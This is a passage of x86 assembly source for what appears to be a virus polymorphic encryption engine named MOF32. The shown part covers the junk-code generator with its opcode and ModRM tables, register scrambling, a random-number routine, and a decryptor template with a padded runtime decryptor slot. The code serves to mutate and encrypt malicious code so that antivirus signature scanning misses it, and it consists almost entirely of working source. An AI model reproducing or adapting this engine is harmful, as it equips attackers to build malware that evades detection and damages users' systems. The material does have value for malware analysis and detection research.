need_sib: ; if we need a SIB byte
|
||
lea esi, dword ptr [ebp+ModRM] ; we compute it rite here...
|
||
mov eax, 8 ;
|
||
call brandom32 ;
|
||
mov ebx, eax ;
|
||
mov eax, 32 ;
|
||
call brandom32 ;
|
||
cmp eax, 4 ;
|
||
je need_sib ;
|
||
cmp eax, 12 ;
|
||
je need_sib ;
|
||
cmp eax, 20 ;
|
||
je need_sib ;
|
||
shl eax, 3 ;
|
||
add esi, eax ;
|
||
add esi, ebx ;
|
||
lodsb ;
|
||
stosb ;
|
||
cmp edx, 12 ;
|
||
jne maybe_32 ;
|
||
mov al, byte ptr [ebp+disp8] ;
|
||
stosb ;
|
||
jmp finish_processing_1 ;
|
||
;
|
||
maybe_32: ;
|
||
cmp edx, 20 ;
|
||
jne finish_processing_1 ;
|
||
mov eax, dword ptr [ebp+disp32] ;
|
||
stosd ;
|
||
jmp finish_processing_1 ;
|
||
;
|
||
finish_processing_1: ;
|
||
jmp over_one_junk ;
|
||
;
|
||
junk_proc2: ; here we use Table 2
|
||
mov eax, 2 ;
|
||
call brandom32 ;
|
||
mov ebx, eax ;
|
||
mov ebx, 1 ; force 16/32bit
|
||
mov eax, Table2_len ; take a random operation
|
||
call brandom32 ; from the Table2
|
||
shl eax, 1 ;
|
||
lea esi, dword ptr [ebp+Table2] ;
|
||
add esi, eax ;
|
||
lodsb ;
|
||
add eax, ebx ; toggle size
|
||
stosb ;
|
||
;
|
||
xor eax, eax ;
|
||
call choose_jreg ;
|
||
mov ebx, eax ;
|
||
shl bx, 3 ;
|
||
call choose_jreg ;
|
||
or bl, al ;
|
||
mov al, bl ;
|
||
or al, 11000000b ; make reg to reg
|
||
stosb ;
|
||
;
|
||
jmp over_one_junk ;
|
||
;
|
||
junk_proc3: ;
|
||
mov eax, Table3_len-2 ; take a random operation
|
||
call brandom32 ; from the Table3
|
||
shl eax, 1 ;
|
||
lea esi, dword ptr [ebp+Table3] ;
|
||
add esi, eax ;
|
||
lodsb ;
|
||
xchg eax, ebx ;
|
||
call choose_jreg ;
|
||
add ebx, eax ;
|
||
xchg eax, ebx ;
|
||
stosb ;
|
||
;
|
||
jmp over_one_junk ;
|
||
;
|
||
junk_proc4: ; Here we create short
|
||
mov [ebp+we_create_jcond], 1 ; conditional jumps
|
||
lea esi, dword ptr [ebp+Table4] ;
|
||
lodsb ;
|
||
xchg eax, ebx ;
|
||
mov eax, 0eh ;
|
||
call brandom32 ;
|
||
add ebx, eax ;
|
||
xchg eax, ebx ;
|
||
stosb ;
|
||
xor al, al ;
|
||
stosb ;
|
||
;
|
||
push word ptr [ebp+flawable] ;
|
||
;
|
||
mov [ebp+flawable], 1 ;
|
||
;
|
||
push edi ;
|
||
call output_one_junk ; output one junk after
|
||
pop ebx ; the conditional jump
|
||
push ebx ;
|
||
xchg edi, ebx ;
|
||
sub ebx, edi ;
|
||
add edi, ebx ;
|
||
pop esi ;
|
||
dec esi ;
|
||
mov byte ptr [esi], bl ;
|
||
;
|
||
mov [ebp+we_create_jcond], 0 ;
|
||
;
|
||
pop word ptr [ebp+flawable] ;
|
||
;
|
||
jmp over_one_junk ;
|
||
;
|
||
junk_proc5: ;
|
||
call choose_jreg ; Make imm to reg
|
||
mov ebx, eax ; choose the register
|
||
mov eax, Table5_len ; take a random operation
|
||
call brandom32 ; from the Table1
|
||
mov eax, 1 ; force 16/32 bit
|
||
mov ecx, eax ; save type
|
||
shl eax, 1 ;
|
||
lea esi, dword ptr [ebp+Table5] ;
|
||
add esi, eax ;
|
||
lodsb ;
|
||
add eax, ebx ;
|
||
;
|
||
stosb ; store opcode
|
||
;
|
||
; don't unmark these!!! I need some more conditions to make 8 bit mov
|
||
; cmp ecx, 1 ;
|
||
; je mov_1632bit ; 16 or 32 bit?
|
||
; ;
|
||
;mov_8bit: ;
|
||
; mov al, byte ptr [ebp+disp8] ; 8 bit imm
|
||
; stosb ;
|
||
; jmp quit_mov ;
|
||
;
|
||
mov_1632bit: ;
|
||
mov eax, 2 ; choose between 16 and
|
||
call brandom32 ; 32 bit
|
||
cmp eax, 0 ;
|
||
je do_16 ;
|
||
mov eax, dword ptr [ebp+disp32] ; 32 bit imm
|
||
stosd ;
|
||
jmp quit_mov ;
|
||
;
|
||
do_16: ;
|
||
dec edi ; 16 bit imm
|
||
mov al, byte ptr [edi] ; we need to override
|
||
mov byte ptr [edi+1], al ; the operand size
|
||
mov byte ptr [edi], 66h ;
|
||
add edi, 2 ;
|
||
mov ax, word ptr [ebp+disp16] ;
|
||
stosw ;
|
||
;
|
||
quit_mov: ; done!
|
||
jmp over_one_junk ;
|
||
;
|
||
junk_proc6: ;
|
||
mov [ebp+we_create_jcond], 1 ;
|
||
mov al, 0fh ;
|
||
stosb ;
|
||
lea esi, dword ptr [ebp+Table6] ;
|
||
lodsb ;
|
||
xchg eax, ebx ;
|
||
mov eax, 0eh ;
|
||
call brandom32 ;
|
||
add ebx, eax ;
|
||
xchg eax, ebx ;
|
||
stosb ;
|
||
xor eax, eax ;
|
||
stosd ;
|
||
;
|
||
push word ptr [ebp+flawable] ;
|
||
;
|
||
mov [ebp+flawable], 1 ;
|
||
;
|
||
push edi ;
|
||
call output_one_junk ;
|
||
pop ebx ;
|
||
push ebx ;
|
||
xchg edi, ebx ;
|
||
sub ebx, edi ;
|
||
add edi, ebx ;
|
||
pop esi ;
|
||
sub esi, 4 ;
|
||
mov dword ptr [esi], ebx ;
|
||
;
|
||
mov [ebp+we_create_jcond], 0 ;
|
||
;
|
||
pop word ptr [ebp+flawable] ;
|
||
;
|
||
jmp over_one_junk ;
|
||
;
|
||
junk_proc7: ;
|
||
mov eax, Table7_len ; take a random operation
|
||
call brandom32 ; from the Table1
|
||
shl eax, 1 ;
|
||
lea esi, dword ptr [ebp+Table7] ;
|
||
add esi, eax ;
|
||
lodsb ;
|
||
stosb ;
|
||
;
|
||
jmp over_one_junk ;
|
||
;
|
||
over_one_junk: ;
|
||
;
|
||
pop ecx ;
|
||
ret ;
|
||
output_one_junk endp ;
|
||
;
|
||
junk_table_procs label ; junk procs addresses
|
||
dd offset junk_proc1 ;
|
||
dd offset junk_proc2 ;
|
||
dd offset junk_proc3 ;
|
||
dd offset junk_proc4 ;
|
||
dd offset junk_proc5 ;
|
||
dd offset junk_proc6 ;
|
||
dd offset junk_proc7 ;
|
||
;
|
||
choose_jreg proc near ; choose one random junk
|
||
mov eax, 3 ; register out of the 3
|
||
call brandom32 ; available
|
||
cmp eax, 0 ;
|
||
jne not_0 ;
|
||
xor eax, eax ;
|
||
mov al, [ebp+jreg1] ;
|
||
ret ;
|
||
not_0: ;
|
||
cmp eax, 1 ;
|
||
jne not_1 ;
|
||
xor eax, eax ;
|
||
mov al, [ebp+jreg2] ;
|
||
ret ;
|
||
not_1: ;
|
||
xor eax, eax ;
|
||
mov al, [ebp+jreg3] ;
|
||
ret ;
|
||
choose_jreg endp ;
|
||
;
|
||
choose_random_disp proc near ; choose random displacements
|
||
push eax ;
|
||
call random32 ;
|
||
mov dword ptr [ebp+disp32], eax ; 32bit
|
||
call random32 ;
|
||
mov word ptr [ebp+disp16], ax ; 16bit
|
||
call random32 ;
|
||
mov byte ptr [ebp+disp8], al ; 8bit
|
||
pop eax ;
|
||
ret ;
|
||
choose_random_disp endp ;
|
||
;
|
||
maxjunks = 5 ;
|
||
max_junk_hunk = 3 ;
|
||
row dd 0 ;
|
||
|
||
ModRM label
|
||
; The Intel(C) instruction set comes in the following mode:
|
||
;
|
||
; Prefixes, Opcode, Mod/RM, SIB, immediate
|
||
;
|
||
; The Mod/RM and SIB bytes are defined in the following table:
|
||
;
|
||
;????????????????????????????????????????????????????????????????????????????
|
||
;? MOD/RM AND SIB BYTE VALUES FOR ALL ADDRESSING MODES USED ?
|
||
;???????????????????????????????????????????????????????????????????????????<3F>
|
||
;? AL CL DL BL AH CH DH BH ? 8BIT REGISTER ?
|
||
;? AX CX DX BX SP BP SI DI ? 16BIT REGISTER ?
|
||
;? EAX ECX EDX EBX ESP EBP ESI EDI ? 32BIT REGISTER ?
|
||
;? 0 1 2 3 4 5 6 7 ? ORDER ?
|
||
;? 000 001 010 011 100 101 110 111 ????????????????????????????????<3F>
|
||
;? MOD/RM VALUE: (MOD = 00) ?16BIT ADDR ?32BIT AD.?SCALE ?
|
||
;????????????????????????????????????????????????????????????????????????????
|
||
db 000h,008h,010h,018h,020h,028h,030h,038h ;?[BX+SI] ?[EAX] ?[EAX] ?
|
||
db 001h,009h,011h,019h,021h,029h,031h,039h ;?[BX+DI] ?[ECX] ?[ECX] ?
|
||
db 002h,00Ah,012h,01Ah,022h,02Ah,032h,03Ah ;?[BP+SI] ?[EDX] ?[EDX] ?
|
||
db 003h,00Bh,013h,01Bh,023h,02Bh,033h,03Bh ;?[BP+DI] ?[EBX] ?[ECX] ?
|
||
db 004h,00Ch,014h,01Ch,024h,02Ch,034h,03Ch ;?[SI] ?[--] ?NONE ?
|
||
db 005h,00Dh,015h,01Dh,025h,02Dh,035h,03Dh ;?[DI] ?D32 ?[EBP] ?
|
||
db 006h,00Eh,016h,01Eh,026h,02Eh,036h,03Eh ;?D16 ?[ESI] ?[ESI] ?
|
||
db 007h,00Fh,017h,01Fh,027h,02Fh,037h,03Fh ;?[BX] ?[EDI] ?[EDI] ?
|
||
; MOD/RM VALUE: (MOD = 01) ? ? ? ?
|
||
db 040h,048h,050h,058h,060h,068h,070h,078h ;?[BX+SI+D8] ?[EAX+D8] ?[EAX*2] ?
|
||
db 041h,049h,051h,059h,061h,069h,071h,079h ;?[BX+DI+D8] ?[ECX+D8] ?[ECX*2] ?
|
||
db 042h,04Ah,052h,05Ah,062h,06Ah,072h,07Ah ;?[BP+SI+D8] ?[EDX+D8] ?[EDX*2] ?
|
||
db 043h,04Bh,053h,05Bh,063h,06Bh,073h,07Bh ;?[BP+DI+D8] ?[EBX+D8] ?[EBX*2] ?
|
||
db 044h,04Ch,054h,05Ch,064h,06Ch,074h,07Ch ;?[SI+D8] ?[--+D8] ?NONE ?
|
||
db 045h,04Dh,055h,05Dh,065h,06Dh,075h,07Dh ;?[DI+D8] ?[EBP+D8] ?[EBP*2] ?
|
||
db 046h,04Eh,056h,05Eh,066h,06Eh,076h,07Eh ;?[BP+D8] ?[ESI+D8] ?[ESI*2] ?
|
||
db 047h,04Fh,057h,05Fh,067h,06Fh,077h,07Fh ;?[BX+D8] ?[EDI+D8] ?[EDI*2] ?
|
||
; MOD/RM VALUE (MOD = 10) ? ? ? ?
|
||
db 080h,088h,090h,098h,0A0h,0A8h,0B0h,0B8h ;?[BX+SI+D16]?[EAX+D32]?[EAX*4] ?
|
||
db 081h,089h,091h,099h,0A1h,0A9h,0B1h,0B9h ;?[BX+DI+D16]?[ECX+D32]?[ECX*4] ?
|
||
db 082h,08Ah,092h,09Ah,0A2h,0AAh,0B2h,0BAh ;?[BP+SI+D16]?[EDX+D32]?[EDX*4] ?
|
||
db 083h,08Bh,093h,09Bh,0A3h,0ABh,0B3h,0BBh ;?[BP+DI+D16]?[EBX+D32]?[EBX*4] ?
|
||
db 084h,08Ch,094h,09Ch,0A4h,0ACh,0B4h,0BCh ;?[SI+D16] ?[--+D32] ?NONE ?
|
||
db 085h,08Dh,095h,09Dh,0A5h,0ADh,0B5h,0BDh ;?[DI+D16] ?[EBP+D32]?[EBP*4] ?
|
||
db 086h,08Eh,096h,09Eh,0A6h,0AEh,0B6h,0BEh ;?[BP+D16] ?[ESI+D32]?[ESI*4] ?
|
||
db 087h,08Fh,097h,09Fh,0A7h,0AFh,0B7h,0BFh ;?[BX+D16] ?[EDI+D32]?[EDI*4] ?
|
||
; MOD/RM VALUE (MOD = 11) ? ? ? ?
|
||
db 0C0h,0C8h,0D0h,0D8h,0E0h,0E8h,0F0h,0F8h ;?EAX/AX/AL ?EAX/AX/AL?[EAX*8] ?
|
||
db 0C1h,0C9h,0D1h,0D9h,0E1h,0E9h,0F1h,0F9h ;?ECX/CX/CL ?ECX/CX/CL?[ECX*8] ?
|
||
db 0C2h,0CAh,0D2h,0DAh,0E2h,0EAh,0F2h,0FAh ;?EDX/DX/DL ?EDX/DX/DL?[EDX*8] ?
|
||
db 0C3h,0CBh,0D3h,0DBh,0E3h,0EBh,0F3h,0FBh ;?EBX/BX/BL ?EBX/BX/BL?[EBX*8] ?
|
||
db 0C4h,0CCh,0D4h,0DCh,0E4h,0ECh,0F4h,0FCh ;?ESP/SP/AH ?ESP/SP/AH?NONE ?
|
||
db 0C5h,0CDh,0D5h,0DDh,0E5h,0EDh,0F5h,0FDh ;?EBP/BP/CH ?EBP/BP/CH?[EBP*8] ?
|
||
db 0C6h,0CEh,0D6h,0DEh,0E6h,0EEh,0F6h,0FEh ;?ESI/SI/DH ?ESI/SI/DH?[ESI*8] ?
|
||
db 0C7h,0CFh,0D7h,0DFh,0E7h,0EFh,0F7h,0FFh ;?EDI/DI/BH ?EDI/DI/BH?[EDI*8] ?
|
||
; ???????????????????????????????????????????????????????????????????????????
|
||
|
||
; The prefixes:
|
||
Operand_size_toggle db 66h ; changes between 16bit and 32bit operands
|
||
Address_size_toggle db 67h ; changes between 16bit and 32bit addressing
|
||
|
||
; The toggle bytes (applied by XORing the OpCode with them):
|
||
Direction_toggle db 02h ; toggles operand->address and address->op.
|
||
Size_toggle db 01h ; toggles between 8bit and 16bit operators
|
||
|
||
; The immediate values used:
|
||
disp8 db 0 ; 8bit displacement
|
||
disp16 dw 0 ; 16bit displacement
|
||
disp32 dd 0 ; 32bit displacement
|
||
|
||
; Reg to/from Address: (second byte 0=only junk register / 1=any register)
|
||
|
||
Table1 label
|
||
db 000h, 0 ; ADD Explanation:
|
||
db 008h, 0 ; OR - unchaged = 8bit addr -> 8bit reg
|
||
db 010h, 0 ; ADC - +1 = 16bit addr -> 16bit reg
|
||
db 018h, 0 ; SBB - +2 = 8bit reg -> 8bit addr
|
||
db 020h, 0 ; AND - +3 = 16bit reg -> 16bit addr
|
||
db 028h, 0 ; SUB
|
||
db 030h, 0 ; XOR
|
||
db 038h, 1 ; CMP
|
||
db 088h, 0 ; MOV
|
||
Table1_len = ($-offset Table1)/2
|
||
|
||
Table2 label
|
||
db 084h, 1 ; TEST - unchanged = 8bit -> 8bit
|
||
db 086h, 0 ; XCHG +1 = 16bit -> 16bit
|
||
Table2_len = ($-offset Table2)/2
|
||
|
||
Table3 label
|
||
db 040h, 0 ; INC +reg number = INC reg
|
||
db 048h, 0 ; DEC +reg number = DEC reg
|
||
db 050h, 0 ; PUSH +reg number = PUSH reg
|
||
db 058h, 0 ; POP +reg number = POP reg
|
||
Table3_len = ($-offset Table3)/2
|
||
|
||
Table4 label
|
||
db 070h, 0 ; Conditonal Jump +0 .. +0Fh = jump condition
|
||
Table4_len = ($-offset Table4)/2
|
||
|
||
Table5 label
|
||
db 0B0h, 0 ; Mov immediate to 8bit reg +reg number = mov to reg
|
||
db 0B8h, 0 ; Mov immediate to 16/32bit reg +reg number = mov to reg
|
||
Table5_len = ($-offset Table5)/2
|
||
|
||
Table6 label
|
||
db 080h, 0 ; Long conditional jmp
|
||
Table6_len = ($-offset Table6)/2
|
||
|
||
Table7 label
|
||
clc
|
||
db 0
|
||
stc
|
||
db 0
|
||
cli
|
||
db 0
|
||
sti
|
||
db 0
|
||
cld
|
||
db 0
|
||
Table7_len = ($-offset Table7)/2
|
||
|
||
Tables label ; this is useless in this
|
||
dd offset Table1 ; version
|
||
dd offset Table2 ;
|
||
dd offset Table3 ;
|
||
dd offset Table4 ;
|
||
dd offset Table5 ;
|
||
dd offset Table6 ;
|
||
dd offset Table7 ;
|
||
;
|
||
Table_numbers = ($-offset Tables)/4 ; this is useful...
|
||
|
||
address_save dd 0
|
||
junk_finish dd 0
|
||
flawable dw 0
|
||
we_create_jcond db 0
|
||
first_intend dd 0
|
||
|
||
; ?<3F><> ?
|
||
; ?<3F> Junk Generator Module End <20>?
|
||
; ? <20><>?
|
||
|
||
;????????????????????????????????????????????????????????????????????????????
|
||
|
||
|
||
|
||
;?????????????????????????????????????????????????????????????????????????????
|
||
;? Here we have the place where the engine chooses the random stuff. ?
|
||
;?????????????????????????????????????????????????????????????????????????????
|
||
|
||
Choose_random_registers Proc Near ; Here we choose the random regs
|
||
pushad ;
|
||
lea edi, [ebp+used_registers] ; point to registers
|
||
lea esi, [ebp+used_registers] ; point to registers
|
||
mov edx, esi ; save position
|
||
mov ecx, 50h ; scramble 50h times
|
||
;
|
||
mangle: ;
|
||
mov eax, 7 ;
|
||
call brandom32 ; choose a random nr. between 0-6
|
||
mov ebx, eax ; in EBX
|
||
mov eax, 7 ;
|
||
call brandom32 ; choose a random nr. between 0-6
|
||
cmp ebx, eax ; in EAX
|
||
je mangle ; if EAX=EBX choose again
|
||
add edi, eax ; increment first pointer
|
||
add esi, ebx ; increment second pointer
|
||
mov al, byte ptr [edi] ; and exchange the values
|
||
xchg byte ptr [esi], al ; between them
|
||
mov byte ptr [edi], al ;
|
||
mov edi, edx ; restore position
|
||
mov esi, edx ;
|
||
loop mangle ; and do it 50h times
|
||
popad ;
|
||
Retn ;
|
||
Choose_random_registers Endp ;
|
||
;
|
||
randomize proc near ;
|
||
push eax ; this randomize procedure must
|
||
mov eax, dword ptr [esp-8] ; be called first when the word
|
||
add dword ptr [ebp+seed], eax ; on the stack is smth. like
|
||
pop eax ; 0BF87.... and it is different
|
||
ret ; for each loaded file depending
|
||
randomize endp ; on different thingies. The
|
||
; seed gets incremented anyway
|
||
random32 proc near ; from generation to generation.
|
||
push ecx ;
|
||
xor ecx, ecx ;
|
||
mov eax, dword ptr [ebp+seed] ;
|
||
mov cx, 33 ;
|
||
;
|
||
rloop: ;
|
||
add eax, eax ;
|
||
jnc $+4 ;
|
||
xor al, 197 ;
|
||
loop rloop ;
|
||
mov dword ptr [ebp+seed], eax ;
|
||
pop ecx ;
|
||
ret ;
|
||
random32 endp ;
|
||
seed dd 0BFF81234h ;
|
||
;
|
||
brandom32 proc near ;
|
||
push edx ; this procedure expects a value
|
||
push ecx ;
|
||
mov edx, 0 ; in EAX and returns a random
|
||
push eax ; number in EAX but smaller than
|
||
call random32 ; EAX's original value. Actually
|
||
pop ecx ; it bounds EAX (0<=EAX<=limit-1)
|
||
div ecx ; EDX and ECX are preserved
|
||
xchg eax, edx ;
|
||
pop ecx ;
|
||
pop edx ;
|
||
ret ;
|
||
brandom32 endp ;
|
||
|
||
|
||
;?????????????????????????????????????????????????????????????????????????????
|
||
;? Here we have the data on the decryptor generation. ?
|
||
;?????????????????????????????????????????????????????????????????????????????
|
||
|
||
decryptor:
|
||
i01: mov ebx, 0 ; mov preg, code_start
|
||
db 0feh ;
|
||
i02: mov ebx, 0 ; mov kreg, key
|
||
db 0feh ;
|
||
i03: mov ebx, 0 ; mov lreg, code_length/8
|
||
db 0feh ;
|
||
i04: mov ebx, dword ptr [ebx] ; mov creg, [preg] (mainloop)
|
||
db 0feh ;
|
||
i05: add ebx, ecx ; creg, kreg
|
||
db 0feh ;
|
||
i06: ror ebx, 0h ; creg, key2
|
||
db 0feh ;
|
||
i07: add ebx, dword ptr [ebx+4] ; creg, [preg+4]
|
||
db 0feh ;
|
||
i08: mov dword ptr [ebx], ebx ; mov [preg], creg
|
||
db 0feh ;
|
||
i09: add ebx, 12345678h ; kreg, keyvalue
|
||
db 0feh ;
|
||
i10: add ebx, 4 ; sub preg, 4
|
||
db 0feh ;
|
||
i11: sub ebx, 1 ; sub lreg, 1
|
||
db 0feh ;
|
||
i12: ;jnz 0 ; jnz mainloop
|
||
db 0fh, 85h ;
|
||
dd 0feh ;
|
||
db 0ffh ;
|
||
|
||
;?????????????????????????????????????????????????????????????????????????????
|
||
;? Here we have the engine's general data. ?
|
||
;?????????????????????????????????????????????????????????????????????????????
|
||
|
||
un_op_code1:
|
||
db 33h ; XOR
|
||
db 2Bh ; ADD
|
||
db 03h ; SUB
|
||
;
|
||
un_op_code2: ;
|
||
db 81h, 11110000b ; XOR
|
||
db 81h, 11101000b ; SUB
|
||
db 81h, 11000000b ; ADD
|
||
;
|
||
un_op_code3: ;
|
||
db 11000000b ; ROL
|
||
db 11001000b ; ROR
|
||
;
|
||
key dd 0 ;
|
||
key2 dd 0 ;
|
||
keyvalue dd 0 ;
|
||
op1 dd 0 ;
|
||
op2 dd 0 ;
|
||
op3 dd 0 ;
|
||
op4 dd 0 ;
|
||
;
|
||
used_registers: ;
|
||
creg Db 0 ; Register to hold the code
|
||
lreg Db 1 ; Register to hold the length of code
|
||
kreg Db 2 ; Register to hold the encryption key
|
||
preg Db 3 ; Register to hold the pointer in code
|
||
jreg1 Db 5 ; Junk register #1
|
||
jreg2 Db 6 ; Junk register #2
|
||
jreg3 Db 7 ; Junk register #3
|
||
;
|
||
counter dd 0 ; instruction counter
|
||
misc db 0 ; misc data
|
||
codeaddr dd 0 ; address of code
|
||
codelength dd 0 ; code length
|
||
mainlp dd 0 ; main loop address
|
||
the_end dd 0 ;
|
||
end_end dd 0 ;
|
||
;
|
||
increment_flag db 0 ; flag
|
||
;
|
||
MOF32 endp ;
|
||
|
||
; ????? ????? ????? ????? ????? ????? ????? ????? ????? ????? ????? ?????
|
||
; ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
|
||
; ????? ????? ????? ????? ????? ????? ????? ????? ????? ????? ????? ?????
|
||
; ????? ?????
|
||
; ? ? ? M?U?L?T?I?P?L?E O?P?C?O?D?E F?A?N?T?A?S?I?E?S 3?2 B?I?T ? ? ?
|
||
; ????? e n d ?????
|
||
; ????? ????? ????? ????? ????? ????? ????? ????? ????? ????? ????? ?????
|
||
; ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
|
||
; ????? ????? ????? ????? ????? ????? ????? ????? ????? ????? ????? ?????
|
||
|
||
end_of_code:
|
||
decrypt: ; where the runtime decryptor gets put...
|
||
db 700h dup (90h) ;
|
||
jmp realstart ;
|
||
end: ;
|
||
end start ;
|
||
end ;
|
||
|
||
|
||
|
||
|